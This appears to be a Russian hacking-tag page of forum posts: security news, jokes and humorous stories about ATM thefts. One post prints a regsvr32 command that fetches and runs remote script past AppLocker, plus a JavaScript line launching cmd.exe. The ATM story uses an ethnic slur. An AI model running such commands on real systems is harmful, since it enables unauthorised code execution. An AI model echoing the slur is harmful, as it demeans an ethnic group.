взлом

Постов: 59 Рейтинг: 113174
7220

"Я взломал Pornhub и они прислали мне эту футболку"

Развернуть
- Что ты делаешь?
- Ищу дыры.
2192

PlayStation 4 взломали

Развернуть
Пользователи немецкого сайта Xtreme-modding сообщили, что им удалось взломать консоль PlayStation 4 от компании Sony. На том же сайте появилась инструкция на немецком языке, а потом и на английском.

Как оказалось, для запуска нелицензионных игр на PS4 необходимо использовать программу OMSK App, а сами игры устанавливать через Install Package.

Источник:
PlayStation 4 взломали
3460

Украли почту

Развернуть
Сегодня с утра решил проверить почту, так как должен был придти очень важный документ. Войти как вы поняли по заголовку не получилось. Ну всё, подумал я - приехали, на почте лежали копии паспорта, логины и пароли, фото с котиками в конце концов! Спустя двух часов попыток - ура, я вспомнил ответ на вопрос и далее увидел следующее. 
Украли почту
3791

Мама, я не на*ер, я хакер!

Развернуть
В тему о тамогочи:
В пору, когда Тамогочи были на пике своей популярности - у меня тамогочи не было, так что я ходил с завистью ко всем своим друзьям. Спустя какое-то время, когда тамогочи были почти у всех - появился он и у меня, но мне было дико завидно, что у всех они уже выросли, а мне ещё предстоят хлопоты с какашками-едой-уборкой (мне сейчас 30 и у меня уже есть настоящий тамогочи).

Я стал думать - как бы ускорить рост - и таки додумался. Достаточно было просто переводить часы на 23:59 в тамогочи и день у него заканчивался, шкала роста росла. Тамогочи рос как на дрожжах! Правда нужно было его хорошенько покормить перед хаком, а то мог окочуриться! Буквально за вечер я "прокачал" на максимум. Все мои друзья были в шоке - как же я так быстро смог вырастить.

В свои 8 лет я почувствовал себя Кевином Митником!
2169

13 друзей Оушена или способы облажаться при краже денег из банкомата

Развернуть
Для начала углубимся немного в дела минувших дней:
За многие годы работы начальником ИТ в банке (который крут, как Брюс Уиллис, только разорился) у нас было украдено порядочно банкоматов.
Кража каждого - это отдельная веселая история, прикольное расследование и наглядное доказательство полной некомпетентности  и нежелания органов полиции выполнять свою работу.
Ни одно дело раскрыто ими не было, даже когда у них были все улики (фото, видео, отпечатки).
Из особенно памятных историй:

1) Всеразрушающее ядро и неразрушаемая стена.
Стоял у нас как-то банкомат в московском филиале 4 ЦНИИ МО РФ . Предприятие конечно же истинно по-русски "якобы секретное, особо охраняемое". Каждый раз, что бы туда попасть нужно было с 9 утра выбранного дня позвонить и оформить заявку на пропуск - по приезду получить пропуск в одном КПП, а проходить на территорию с ним в другом. И никак иначе. Ибо режим.

Ночью некие герои оглушили военную охрану на КПП и за три часа вкрыли банкомат.

Руководство 4 ЦНИИ больше всего растроило, что эти герои не оформили пропуск.

Вывод: Большинство живой охраны на местах - бутафория.

2) Сплинтер снова спасает мир. Черепашки отдыхают.
Недалеко от предыдущего стоял другой банкомат в продуктовом магазине не далеко от м. Медведково. Жарким летом 2010го решили хозяева магазина сделать в нем ремонт и превратить быдло-супермаркет в приличные продуктовые ряды. Нами банкомат был выгружен и вынесен в тамбур.
Через пару месяцев ремонт был закончен, в тамбур проведены розетки и мы поехали его загружать. При открытии банкомата тамбур внезапно наполнился смачным смрадом дохлой крысятины.
Оказалось, пока шел ремонт в банкомат пролезла крыса. Наевшись термобумаги для принтера, она поняла, что тонер - не самая полезная для здоровья вещь и сдохла на месте преступления.
Естественно, убирать мне и инкассаторам все это счастье было влом, да и чистить нечем.
Мастер же обслуживающей конторы Ланит сказал, что случай не гарантийный и чистка стоит денег.

Пока наш банк согласовывал счета на проплату негарантийной крысы - банкомат сперли.
Пустой и с дохлой крысой внутри.
Вывод: Перед кражей банкомата стоит убедиться, что в нем есть деньги.

3) Бармен, повторите пожалуйста!
Следующий случай произошел в администрации поселка Пирогово.
Сразу скажу - воровали банкомат у нас там дважды и сейчас стоит уже третий. Ну да все по порядку.

Первый раз был довольно прост и тактичен. Работали настоящие профи.
Так как охраны тогда в администрации, кроме сторожа с зарплатой 8к/мес не было никакой, они просто проникли через окно, связали охранника, перетащили банкомат из тамбура внутрь здания на канатах и за 10 минут его вскрыли. На все про все пол часа. Быстро, просто, чисто. Респект таким парням.

Второй раз.
Второй раз вообще не должен был в идеале произойти.
После первого раза администрация заявила, что поставила сигнализации на окна (как оказалось потом не на все) и оплатила услуги ЧОПа. Охраннику был выдан брелок с кнопкой.
Нажимаешь кнопку - из соседнего здания прибегают ЧОПовцы.
Казалось бы, система - нипель. Но это Россия.
Молодые спортивные пацаны в спортивной форме, по странному стечению обстоятельств залезли через окно мужской раздевалки в спортзале того же здания (как вы понимаете, полиция решила, что местные спортсмены не причем и сверять их лица с камер не стала).
Охранник услышал странные звуки в раздевалке, а далее, внимание, положил брелок и пошел смотреть что там за шум. В общем-то здравый человек с нормальным инстинктом самосохранения.
Далее его повязали и с помощью двух ломов и чьей-то матери за час расколупали банкомат в котором....практически не было денег.
Действительно, за день до этого к банкомату приезжали инкассаторы.
Да, они ковырялись с банкоматом и пихали кассеты.
Нет, они не загрузили новые кассеты, потому что налажали при инкассации, позвонили мне, но я был в отпуске и сказал, что бы оставили старые и отложили до понедельника.

В итоге спортсмены получили целых 100к вместо возможных трех миллионов.
Вывод: Стоит внимательней проверять, а действительно ли в банкомате много денег.

4) Вот пуля просвистела, в грудь попала мне...
Случай в самой известной королевской шараге под названием КИУЭС.
Запомнился мне наибольшей паникой среди руководства вышеозначенного заведения.
И небольшим нежданчиком.
Естественно, вся охрана учебного заведения - была фикцией на бумаге.
Естественно, сигнализация там стоит только на парадных окнах, которые показывают проверкам и комиссиям.
Естественно, местные ЧОПовцы ни за что не отвечают.
Когда очередная партия дерзких ребят вошла в каморку к высокооплачиваемому ночному сторожу, тот поднял руки и сказал - забирайте кто что хочет, только меня не трогайте.
Все эти дубинки, газовые пистолеты, шокеры и тревожные кнопки, которые им выдают - бутафория.
Дальше парни аккуратно положили банкомат и начали методично его расколупывать с помощью двух ломиков.

И тут был нежданчик.

Нежданчик крылся в системе болтов на сейфах банкоматов фирмы NCR, отличающих их от всех остальных.
На этих банкоматах болты с уникальным принципом "отстрела вверх".
Собственно, при вскрытии сейфа один такой болт смачно отстрелился в мужика стоящего на шухере перед банкоматом, пролетел рядом с ухом и разбил два стекла в тамбуре за ним.

Я раз пять пересматривал этот момент на записи с камер охраны.

Нажатие на лом, отстрел, вздрогнувшее тело, вся жизнь перед глазами, осознание собственного везения, мокрые штаны.
Конечно, я пошутил про мокрые штаны.

Вывод: Банкомат - технически сложный аппарат. Стоит внимательней изучить его схемы имеющиеся в интернете, перед выходом на дело. Против лома нет приема, кроме болта в табло.

5) Крайний, но не последний случай. Я назову его "Случаем с арбузиком".
Был у нас банкомат в магазине Фабрика-кухня у памяника Ленину.
Собственно, в через пару дней его должны были перевезти в помещение стоматологии, но что-то не срослось у перевозчиков и все это отложили на следующую неделю.
Точнее - навсегда.
Этой ночью, пара веселых и озорных, однако по настоящему тупых хачей с ближайшей стройки решили озолотиться.
Надо сказать, что обносили магазины стоящие в этом помещении уже не раз, но банкомат никогда не трогали.
Видимо, настал его час.
Хачи подошли к делу здраво. Банкомат железный - его нужно пилить.
Принесли со свой стройки крутой н**бических размеров инструмент (похожий на бензопилу, только режущую метал)
Смачно уронили 300кг банкомат. И начали его пилить.
Пилили они его долго.
Во всех местах.
Нет, реально.
Они пробовали его пилить вообще во всех местах.
Вскрыли верх - поняли, что там денег нет.
Вскрыли купюроприемник - поняли что там тоже денег нет.
Отпилили петли - поняли что у банкомата двусторонний замок.
Отпилили крепежную полосу с одной стороны - поняли что таких 4 и это писец.
Устали.
Вскрыли ближайший овощной ларек, вскрыли ларек торгующий посудой.
Сели поесть арбузика с виноградом.
Тут какой-то шухер их спугнул и они смылись так и оставив дело не доделанным.
Естественно без денег.

Когда я сегодня пытался вскрыть сейф и достать деньги я понял три вещи:
1) Они безбожно заклинили замок.
2) Им оставалось допилить ровно 1см планки и дверь бы выпала сама.
3) Смесь сока арбузика и пыли для снятия отпечатков следаков - мезкая, отвратительная и ВЕЗДЕ, БЛЕАТЬ!

В общем-то, зачем что-то долго рассказывать, если можно показать?
13 друзей Оушена или способы облажаться при краже денег из банкомата
13 друзей Оушена или способы облажаться при краже денег из банкомата
13 друзей Оушена или способы облажаться при краже денег из банкомата
13 друзей Оушена или способы облажаться при краже денег из банкомата
13 друзей Оушена или способы облажаться при краже денег из банкомата
Вывод: Если вы приехали из южных стран, любите арбузы, виноград и овец, не стоит пытаться вскрывать банкоматы.
Это реально не ваша тема.
1403

Оказывается, среди взломщиков есть душевные люди

Развернуть
Пояснение: подруга действительно частенько пользуется электронным кошельком, который мне неизвестен, уж мобильник-то я ее бы отличил от левого.

Подруга моя, переписка моя.
Оказывается, среди взломщиков есть душевные люди
1414

Москвич подал в суд на Google из-за взломанной учетной записи, требуя вернуть ему потраченные в игре 250 000 рублей.

Развернуть
Максим Кондрашов играл в мобильную стратегию Castle Clash от студии IGG и, по его словам, за два года потратил в ней 250 547 рублей. Геймер прокачивал игровой персонаж: покупал оружие, броню и артефакты. Но в июне 2015 года, как он утверждает, его аккаунт и почта Google были взломаны. Соответственно, он потерял и все достижения в игре.
Кондрашов обратился в техническую поддержку, ему пообещали помочь, но после долгого ожидания отказали. Новый владелец аккаунта изменил данные, а в ответ на жалобу в поддержке Google заявили, что учетная запись не принадлежала Кондрашову. В августе 2016-го года геймер нанял адвоката и обратился в суд.


Максим подтвердил, что обратился в Замоскворецкий суд Москвы, но из-за неготовности Google заседание перенесли на 19 октября. От других комментариев он отказался, заявив, что будет говорить только после суда.
1494

Хакеры раскрыли масштабы деятельности саентологов в России.

Развернуть
Хакеры-озорники из BlackHat взломали сервера "церкви" саентологии и выложили пикантные подробности. Все как обычно письма, экселевские таблички с прибылью. Но! Конкретно меня удивило\возмутило то, что саентологи:
1. гребут бабло лопатой наживаясь на доверчивых людях.
2. договариваются с РПЦ? Оо
3. поставляют в детсад витаминки для детишек ^^

ау, прокуратура?

в общем и целом интересная статья.

Пруф:

в жж их уже забанили((

2751

Голые фотографии

Развернуть
Голые фотографии
316

L0phtCrack обновился через 7 лет после последнего релиза

Развернуть
Знаменитый инструмент для аудита и взлома паролей, L0phtCrack, обновился, спустя семь лет после выпуска последнего релиза. Новая версия обзавелась поддержкой многоядерных CPU и GPU, благодаря чему L0phtCrack теперь работает в несколько раз быстрее.

L0phtCrack был создан 19 лет назад, и с тех пор судьба инструмента складывалась довольно необычно. Так, в 2004 году L0phtCrack, вместе с фирмой , приобрела компания Symantec, однако уже в 2006 году, опасаясь возможных нарушений экспортного законодательства, компания прекратила продажи, и развитие программы практически сошло на нет. Однако разработчики не сдались: в 2009 году авторы L0phtCrack сумели выкупить права на программу обратно и вскоре выпустили L0phtcrack 6. Именно эта версия с поддержкой 64-битных процессоров являлась наиболее свежей до недавнего времени.
L0phtCrack обновился через 7 лет после последнего релиза
Авторы L0phtCrack не скрывали, что работают над седьмой версией программы, но на разработку понадобилось немало времени. Теперь, когда L0phtCrack 7 представлен официально, разработчики объясняют, что они реконструировали инструмент полностью и едва ли не переписали с нуля.

C появлением поддержки многоядерных процессоров L0phtCrack работает гораздо быстрее. При работе с обычным четырехядерным CPU время взлома ускорилось в пять раз по сравнению с прошлой версией, а если задействовать мощные GPU-решения, вроде AMD Radeon Pro Duo, скорость может возрасти до 500 раз. Разработчики L0phtCrack утверждают, что теперь взлом паролей стал даже проще, чем почти два десятилетия назад:
Новая версия L0phtCrack работает со всеми ОС семейства Windows, а также поддерживает новые типа парольных хешей UNIX и может работать с другими импортерами и инструментами для взлома через функции плагина.
У L0phtCrack 7 есть бесплатный пятнадцатидневный триал, но цена на полную версию приложения начинается от $595.
L0phtCrack обновился через 7 лет после последнего релиза
Пруф:
Сайт L0phtCrack:
ПыСы: Опубликовано в ознакомительных целях!
Прошу прощения за вызов пользователя stake)))
2795

Воришка из Челябинска

Развернуть
В челябинском микрорайоне "Парковый", сегодня, 31 августа, средь бела дня неизвестный попытался проникнуть в квартиру. Подобрав отмычку к замку, он открыл дверь, но испугался хозяина и убежал, сообщает корреспондент ГТРК "Южный Урал".
Инцидент произошел в 14:40 в доме на улице А. Шмакова, 23. Действуя осторожно, злоумышленник сначала позвонил в квартиру три раза и проверил, нет ли никого дома. Также он позвонил в квартиру соседей. Сделав выводы о том, что раз никто не открывает – значит, дома никого нет, злоумышленник начал попытку вскрытия. Тем временем хозяин был дома и спал, от звонков проснулся, но не стал открывать дверь.
"Примерно 5 минут у него ушло, чтоб подобрать отмычки. К этому времени я уже оделся и начал снимать, а потом он легко повернул на два оборота замок и открыл дверь", – рассказал хозяин квартиры.
Догнать взломщика не удалось.
Ссылка на видео в коментах
Воришка из Челябинска
993

Придуман способ массового взлома аккаунтов Facebook

Развернуть
Независимый исследователь из Калифорнии, Гуркират Синх (Gurkirat Singh), в своем блоге дал ответ на животрепещущий для многих вопрос: как взломать аккаунт Facebook? Синх метод, который позволял ломать аккаунты массово, вне зависимости от сложности и длины пароля, а также двухфакторной аутентификации.
Придуман способ массового взлома аккаунтов Facebook
Синх нашел проблему в механизме, при помощи которого социальная сеть обнуляет забытые пароли пользователей. Как только кто-то запрашивает смену пароля, Facebook осуществляет эту операцию через генерацию случайного шестизначного кода, то есть комбинаций для таких кодов может быть всего 10⁶ = 1 000 000.

Исследователь обнаружил, что если запросить смену пароля через mbasic.facebook.com, шестизначный код сменится и придет в негодность лишь после его использования, то есть, фактически у него нет «срока годности». Синх понял, что если миллион человек запросит смену пароля примерно одновременно, то код, который социальная сеть создаст для миллион первого, будет дублировать чей-то еще.

Для проверки своей теории исследователь собрал базу Facebook ID, забрасывая запросами API Facebook Graph API. Синх методично перебирал ID, начиная с 100 000 000 000 000. Дело в том, что ID — это уникальный идентификатор, обычно состоящий из 15 символов. С ID разрешено работать только авторизованным приложениям, но если попытаться воспользоваться адресом www.facebook.com/[ID], произойдет редирект, ID будет автоматически заменен на имя пользователя. Что подтвердит верность ID. Также исследователь смог присовокупить к своей базе фотографии профилей и полные имена пользователей, так как социальная сеть никак не ограничивала распространение этой свободной информации. Суммарно Синх собрал о двух миллионах учетных записей.
Имея на руках базу, состоящую из двух миллионов пользователей, Синх написал скрипт, который использовал сотни прокси и рендомных user-agent. Скрипт запрашивал сброс паролей для всех двух миллионов пользователей, быстро исчерпывая пул «одноразовых» шестизначных кодов. Затем исследователь выбрал случайное число (к примеру, 33825) и начал процедуру смены пароля, брутфорсом перебирая весь имеющийся двухмиллионный список. Надежды Синха полностью оправдались, так как в итоге в списке действительно удалось обнаружить пользователей, которым шестизначный код подходил, то есть алгоритм Facebook действительно начал повторяться, как и предполагалось.
Придуман способ массового взлома аккаунтов Facebook
Хотя компания уже выпустила патч, призванный устранить обнаруженную Синхом проблему, исследователь не уверен, что проблема полностью решена.
987

Медвежатник 80 lvl

Развернуть
Случай произошел со мной, когда я находился в командировке на одном нефтеперерабатывающем заводе в Поволжье.
Завод находился глубоко в жопе в области рядом с деревней, поэтому гостиницы не было и проживал я прямо на территории завода - в одной комнатке в заводоуправлении. Напротив моей комнаты находился медпункт.
Однажды утром, позавтракав в заводской столовой я возвращался в свой "номер" и увидел картину. У двери медпункта стоит медсестра и, практически со слезами на глазах, пытается открыть дверь. К ней присоединяется какой то мужик и они уже вдвоем пытаются повернуть ключ. Но дверь не в настроении и не хочет никого пускать в обитель спирта и ваты. Мужик сдается и уходит, медсестра обращается ко мне (я уже подошел к своей двери) - "Может вы поможете?".
Попробую. Беру ключ, вижу что он не доходит до конца, поэтому и не поворачивается. Посветив фонариком из телефона в личину я увидел, что одна из пластинок (ключ полукруглый) опустилась и перегораживает путь ключу. Спрашиваю:
- У вас нет булавки или скрепки?
- (С недоверием) Вы можете скрепкой открыть дверь? У меня скрепки нет, но вот в бухгалтерии точно есть (указывает на соседнюю дверь).
Я зашел в бухгалтерию, спер с чьего то стола скрепку, разогнул ее и поправил пластинку.
Ключ вошел в замок, повернулся и дверь открывается. У медсестры выкатываются глаза от удивления, затем апплодисменты, обнимашки, предложение зайти вечером на бокал спирта.
Вот такой вот медвежатник...
230

ВНИМАНИЕ! Опасный вирус-шифровальщик для 1С

Развернуть
Антивирусная компания "Доктор Веб" сообщила 22 июня 2016 г. о том, что выявлен опасный вирус для 1С:Предприятия – троянец, запускающий шифровальщика-вымогателя.

Троянец распространяется в виде вложения в сообщения электронной почты с темой «У нас сменился БИК банка» и следующим текстом:

К письму прикреплен файл внешней обработки для программы «1С:Предприятие» с именем ПроверкаАктуальностиКлассификатораБанков.epf. Тело этого модуля защищено паролем, поэтому просмотреть его исходный код стандартными средствами невозможно. Если получатель такого письма последует предложенным инструкциям и откроет этот файл в программе «1С:Предприятие», на экране отобразится диалоговое окно.
Какую бы кнопку ни нажал пользователь, 1C.Drop.1 будет запущен на выполнение, и в окне программы «1С:Предприятие» появится форма с изображением забавных котиков.

В это же самое время троянец начинает свою вредоносную деятельность на компьютере. В первую очередь он ищет в базе 1С контрагентов, для которых заполнены поля с адресом электронной почты, и отправляет по этим адресам письмо с собственной копией. Текст сообщения идентичен приведенному выше. Вместо адреса отправителя троянец использует e-mail, указанный в учетной записи пользователя 1С, а если таковой отсутствует, вместо него подставляется адрес 1cport@mail.ru. В качестве вложения троянец прикрепляет к письму файл внешней обработки с именем ОбновитьБИКБанка.epf, содержащий его копию. Пользователи, попытавшиеся открыть такой файл в приложении 1С, также пострадают от запустившегося на их компьютере шифровальщика, однако эта копия 1C.Drop.1 разошлет по адресам контрагентов поврежденный EPF-файл, который программа «1С:Предприятие» уже не сможет открыть. 1C.Drop.1 поддерживает работу с базами следующих конфигураций 1С:

"Управление торговлей, редакция 11.1"
"Управление торговлей (базовая), редакция 11.1"
"Управление торговлей, редакция 11.2"
"Управление торговлей (базовая), редакция 11.2"
"Бухгалтерия предприятия, редакция 3.0"
"Бухгалтерия предприятия (базовая), редакция 3.0"
"1С:Комплексная автоматизация 2.0"

После завершения рассылки 1C.Drop.1 извлекает из своих ресурсов, сохраняет на диск и запускает троянца-шифровальщика Trojan.Encoder.567. Этот опасный энкодер, имеющий несколько модификаций, шифрует хранящиеся на дисках зараженного компьютера файлы и требует выкуп за их расшифровку. К сожалению, в настоящее время специалисты компании «Доктор Веб» не располагают инструментарием для расшифровки файлов, поврежденных этой версией Trojan.Encoder.567, поэтому пользователям следует проявлять особую бдительность и не открывать полученные по электронной почте файлы в приложении «1С:Предприятие», даже если в качестве адреса отправителя значится адрес одного из известных получателю контрагентов.



1102

Cпособ украсть ваш пароль от Яндекс почты.

Развернуть
Ваш пароль от яндекса достаточно ценная информация, особенно если вы используете яндекс.деньги. И сегодня я наблюдал довольно хитрый и замороченный метод, как у меня пытались этот пароль увести. Решил показать этот метод тут, чтобы никто из наших не попался или хотя бы кто-то кто случайно это прочитает — не повёлся.
Cпособ украсть ваш пароль от Яндекс почты.
Итак, получил я сегодня письмо от моего регистратора и в поле отправитель вижу привычное: «RU-CENTER <no-replay@nic.ru>». Хотя в это даже особо не вглядываешься, так как тема письма достаточно цепляющая.
Cпособ украсть ваш пароль от Яндекс почты.
И что-то меня в письме смутило, наверно отсутствие значка, которое есть в обычных письмах от руцентра.
Cпособ украсть ваш пароль от Яндекс почты.
То есть раз проверки DKIM не пройдены — значит поле отправитель мог заполнить кто угодно и это явно не руцентр. Но в чём подвох пока понять не могу.


Далее кликаю на ссылку «посмотреть приложенный документ» (которая выглядит как обычная ссылка от яндекса, а не продукт хитрой HTML-вёрстки) — попадаешь на страничку очень похожую на Яндект документ с текстом заявления, но уже через 2 секунды неожиданно «слетает авторизация» и надо ввести пароль. Надо сказать, изобретательно сделано.
Cпособ украсть ваш пароль от Яндекс почты.
Тут стоит обратить внимание на домен. И он явно не от яндекса.


Поняв, что они хотят получить пароль — я ввёл случайный набор символов и «о чудо» авторизировался и смог неспешно прочитать «жалобу». На этом всё, будьте внимательны и никому не отдавайте ваш пароль.

Источник:
542

Сосед

Развернуть
Даже не знаю с чего начать. Начну с того, что пришел я не запланировано домой в обед. Разделся до белья, дома жарко, кондер я не уважаю, начал готовить обед. Слышу стучат в дверь, привычку открывать в белье я не имею, начал одеваться. Несколько раз повторный стук, подхожу к двери и тут начинают ковырять в замке! В акуе смотрю в глазок - сосед копается в замке. Про соседа нужно отдельно: Две недели назад меня разбудили в полночь удары в дверь соседа, рядом находится, открываю дверь, смотрю - два полицейских. Вышел к ним, выяснилось, сосед вскрыл булыжником две иномарки во дворе(одна кстати впритык стояла к моей), был понятым в 100500-й раз, ну это мелочи. К нему они так и не попали. Он тупо не открыл дверь, а у них нет права вскрывать квартиру без ордера. Напрягались, что им скажет начальник УВД города.

Заметил, что ковыряют, не стал ни видео писать, ничего, в шоке от такой борзоты начал открывать дверь с определенными намерениями, сосед отпрыгнул от двери запрыгнул к себе и закрылся. Сколько я потом не стучал и не бил - он не открыл. Помните покоцаную дверь из поста? вот этот коммент вспомнился, сосед мне до груди по росту, я метр девяносто. Как думаете, стоит ли вообще дальше полицию привлекать? И вообще, как бы кто поступил в данной ситуации?
163

Издевательство над распостранителями шифровальщиков. В четвёртый раз с начала года

Развернуть
У операторов ботнета Dridex, который в последнее время занимается распространением шифровальщика Locky, определенно выдался плохой месяц. Инфраструктуру ботнета опять взломал неизвестный gray hat доброжелатель, подменив вредоносный пейлоад на предупреждение о малвари.

Этот взлом стал для Dridex четвертым с начала года. Инфраструктура ботнета, ранее распространявшего одноименный банковский троян, а теперь занимающегося дистрибуцией вымогателя Locky, подвергается издевательским атакам раз за разом. Пару недель назад, в начале мая 2016 года, неизвестные хакеры полностью удалили исходные коды вымогателя с серверов, подменив их всего двумя словами: «Дурацкий Locky» (Stupid Locky).
Издевательство над распостранителями шифровальщиков. В четвёртый раз с начала года
Еще чуть раньше, в апреле 2016 года, в панель управления одного из подконтрольных Dridex ботнетов сумели проникнуть специалисты компании Buguroo. По итогам исследователи опубликовали интересный отчет об устройстве бекэнда Dridex, а также сумели собрать много полезных данных.

В феврале 2016 года Dridex взломали еще раз, подменив загрузчик банковского трояна Dridex (тогда ботнет еще не переключился на распространение Locky) на оригинальную и самую свежую версию инсталлятора бесплатного антивируса Avira.
Издевательство над распостранителями шифровальщиков. В четвёртый раз с начала года
17 мая 2016 года специалисты компании F-Secure сообщили о новом инциденте. На этот раз исследователи обнаружили вместо пейлоада Locky файл, который учит пользователей азам компьютерной безопасности. JScript, который загружается с серверов ботнета, оказался вовсе не малварью, а предупреждением о том, что не следует открывать подозрительные файлы.
Издевательство над распостранителями шифровальщиков. В четвёртый раз с начала года
«Вы читаете это сообщение, потому что открыли вредоносный файл. Ради вашей собственной безопасности: не открывайте почтовые вложения из неизвестных источников», — гласит сообщение.

Специалисты F-Secure саркастично отмечают, что неизвестному gray hat’у, пожалуй, не стоило использовать термин «вредоносный файл», потому что большинство пользователей все равно не поймут, что это такое. По мнению аналитиков, нужно было написать проще: «Вы читаете это сообщение, потому что кликнули на компьютерный вирус, но я (мы?) взломал хакеров, чтобы они не могли взломать вас. В следующий раз удача может не быть к вам так благосклонна. Впредь будьте осторожнее».

Источник: журнал "Хакер"
1685

Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни

Развернуть
Специалисты McAfee Labs обнаружили новое семейство малвари — Dynamer. Авторы вредоноса используют для атак секретную функцию «режим бога» (GodMode), которая впервые появилась в операционных системах Microsoft во времена Windows Vista.
Хакеры эксплуатируют
О существовании функции GodMode известно давно. Чтобы активировать «режим бога» в Windows, нужно осуществить всего пару простых операций. Необходимо создать на рабочем столе новую папку с именем вида GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}. «GodMode» при этом можно заменить любым другим набором символов, а вот дальнейшую последовательность изменять нельзя.

В созданной папке будут отображаться все доступные пользователю настройки ОС, в том числе и те, которые не входят в меню «Панели управления» и «Параметров». Предполагается, что это не просто «пасхалка», а функция, которую разработчики Microsoft используют для дебаггинга.

Исследователи McAfee Labs обнаружили, что бекдор Dynamer использует GodMode для атак. Чтобы закрепиться в системе, малварь создает в реестре Windows запись, благодаря которой вредоносный процесс стартует при каждом запуске системы. Запись в реестре выглядит следующим образом:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
lsm = C:\Users\admin\AppData\Roaming\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\lsm.exe

Dynamer помещается в папку com4, внутри %AppData%. Данная запись в реестре использует чуть измененную версию «режима бога», что позволяет малвари нормально функционировать, но если попытаться открыть папку com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}, произойдет автоматическая переадресации в RemoteApp and Desktop Connections.
Хакеры эксплуатируют
Как можно заметить, путь GodMode немного изменен, чтобы указывать непосредственно на RemoteApp and Desktop Connections. Замена имени «GodMode» на «com4» обусловлена желанием хакеров остаться в системе навсегда. Именно из-за этого нюанса от Dynamer крайне трудно избавиться.

«Использовать такое имя в нормальном Windows Explorer и cmd.exe запрещено. Операционная система будет относиться к такой папке как к устройству, что помешает пользователю удалить данную директорию через “Проводник” или командную строку», — поясняет Крейг Шмугар (Craig Schmugar).
Хакеры эксплуатируют
Хакеры эксплуатируют
Специалисты McAfee Labs всё же придумали способ избавления от вредоносной папки. Для этого понадобится выполнить команду:

> rd “\\.\%appdata%\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}” /S /Q
McAfee Labs 
Пост 
265

Из банка Катара утекли данные королевской семьи, спецслужб и «АЛЬ-ДЖАЗИРЫ»

Развернуть
Неизвестные хакеры взломали Национальный банк Катара и похитили банковские и персональные данные его клиентов. Утечка интересна тем, что пострадали не простые люди, а правящая верхушка страны и обладатели многомиллиардных состояний. В архиве, который опубликовали злоумышленники, содержатся сведения о членах семьи эмира Катара, правительственных чиновниках, представителях катарского военного ведомства, а также о спецслужбах нескольких стран мира.
Из банка Катара утекли данные королевской семьи, спецслужб и «АЛЬ-ДЖАЗИРЫ»
В полуторагигабайтном архиве с утекшими документами указаны номера кредитных карт, пароли, телефонные номера, даты рождения и другая персональная информация клиентов банка. По оценке специалистов, количество похищенных номеров кредитных карт составляет около миллиона.


Информационное агентство Reuters обнаружило в архиве журнал денежных переводов, совершённых клиентами банка до августа 2015 года. В другом файле содержался список 465437 банковских счетов, но подробная информация была указана лишь для некоторых из них. Видные представители правительства и СМИ Катара, имена которых упоминаются в утекших файлах, подтвердили Reuters, что информация о них соответствует действительности.

Одна из папок в архиве озаглавлена словом SPY («шпион»). Именно в ней сохранена информация о королевской семье Катара, катарской разведке (Мухабарат) и министерстве обороны. Кроме того, она содержит сведения о спецслужбах Польши, Франции и Великобритании (MI6).

Там же приведены данные более чем 1200 сотрудников известной во всём мире телекомпании «Аль-Джазира», которую основала и финансирует королевская семья Катара. В архиве содержатся их адреса, контактная информация, ссылки на их учётные записи в социальных сетях, а в некоторых случаях и фотографии. Некоторые записи о журналистах «Аль-Джазиры» помечены словом «SPY».

Специалист по информационной безопасности Оман Бенбуазза сообщил изданию International Business Times, что злоумышленники атаковали банковские серверы Oracle при помощи sqlmap, популярной утилиты, автоматически определяющей и эксплуатирующей уязвимости, которые делают возможным внедрение кода SQL. Это, по его словам, следует из опубликованных логов. Бенбуазза предполагает, что затем они воспользовались openDoc.jsp, чтобы повысить права доступа до уровня User5 и выкачать всю необходимую им информацию.

Национальный банк Катара заявил, что ни ему самому, ни его клиентам не был нанесён финансовый ущерб. Сейчас банк расследует происшествие.


Некоторые файлы из архива, который опубликовали злоумышленники
Из банка Катара утекли данные королевской семьи, спецслужб и «АЛЬ-ДЖАЗИРЫ»
Материалы:
Архив с данными 
Reuters 
Оман Бенбуазза 
Заявление банка 
Пост 
371

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ

Развернуть
Независимый исследователь Кейси Смит (Casey Smith) обнаружил интересный способ обхода средства безопасности Windows AppLocker. Техника Смита не требует привилегий администратора. Всё, что понадобится для атаки, это лишь короткая команда, код которой уместится даже в один твит.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ
Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.

Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.

Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.

Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.

Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.

Так, в описанном выше примере JavaScript использует ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.

Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.
